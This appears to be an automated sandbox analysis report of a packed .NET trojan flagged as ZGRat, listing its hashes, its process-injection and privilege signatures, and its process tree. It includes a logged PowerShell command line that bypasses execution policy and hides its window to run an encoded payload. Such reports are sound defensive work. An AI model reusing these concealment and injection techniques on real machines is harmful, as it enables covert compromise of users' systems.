Analysis

- Max time kernel: 130s
- Max time network: 140s
- Platform: windows7_x64
- Resource: win7-20231129-en
- Resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
- Submitted: 08-05-2024 14:17

Tasks

- Static task: static1
- Behavioral task: behavioral1
  - Sample: SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
  - Resource: win7-20231129-en
General

- Target: SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
- Size: 632KB
- MD5: 9ffcbf13ec0d927ab745589c64dba569
- SHA1: 74e9aa1a9225f2acc5ee4aa86993970d3d6df5a8
- SHA256: dfba4d1c63cb8b9e426b04fa2b048bfe4554de13e7ce1c2c5e665cc708a23d09
- SHA512: cb695ca80b70b6b09af9a43d13363aab86186ca0c44d1f324dfb4bb2d978873cde900efc87b4db0ff2b9d0a321b626a1de97c31a995f5c4e437b16ad3f96ae25
- SSDEEP: 12288:9ziGDwpg7nTwyrc30trN3OERv1Qdee1teN4FhunLNhcZU+sNmtwZ:9jrTNrc3aOgv1OeCeSh0NhQU1NmiZ
Malware Config
Signatures

- Detect ZGRat V1 (1 IoC)
  resource | yara_rule
  behavioral1/memory/1720-2-0x000000001B700000-0x000000001B804000-memory.dmp | family_zgrat_v1

- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide the display window.
  pid | Process
  2588 | powershell.exe

- Executes dropped EXE (1 IoC)
  pid | Process
  3000 | TypeId.exe

- Loads dropped DLL (1 IoC)
  pid | Process
  2564 | taskeng.exe

- Drops file in System32 directory (1 IoC)
  description | ioc | Process
  File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

- Suspicious use of SetThreadContext (1 IoC)
  description | pid | Process | procid_target
  PID 3000 set thread context of 3016 | 3000 | TypeId.exe | 35

- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid | Process
  2588 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1720 | SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe
  Token: SeDebugPrivilege | 2588 | powershell.exe
  Token: SeDebugPrivilege | 3000 | TypeId.exe
  Token: SeDebugPrivilege | 3016 | RegAsm.exe

- Suspicious use of WriteProcessMemory (13 IoCs)
  description | pid | Process | procid_target
  PID 2900 wrote to memory of 2588 | 2900 | taskeng.exe | 31
  PID 2900 wrote to memory of 2588 | 2900 | taskeng.exe | 31
  PID 2900 wrote to memory of 2588 | 2900 | taskeng.exe | 31
  PID 2564 wrote to memory of 3000 | 2564 | taskeng.exe | 34
  PID 2564 wrote to memory of 3000 | 2564 | taskeng.exe | 34
  PID 2564 wrote to memory of 3000 | 2564 | taskeng.exe | 34
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35
  PID 3000 wrote to memory of 3016 | 3000 | TypeId.exe | 35

- Uses Task Scheduler COM API (1 TTP)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

- C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe (PID 1720, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.PackedNET.2147.22278.5618.exe"
  - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\taskeng.exe (PID 2900, depth 1)
  Command line: taskeng.exe {7BB82FBB-0E47-401E-87F1-F5A180EA7082} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:S4U:
  - Suspicious use of WriteProcessMemory

  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2588, depth 2)
    Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc 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
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\taskeng.exe (PID 2564, depth 1)
  Command line: taskeng.exe {25B859C0-6D7D-4A12-886D-050EB29E8B45} S-1-5-21-3627615824-4061627003-3019543961-1000:SCFGBRBT\Admin:Interactive:[1]
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory

  - C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe (PID 3000, depth 2)
    Command line: C:\Users\Admin\AppData\Roaming\DelaySign\TypeId.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe (PID 3016, depth 3)
      Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15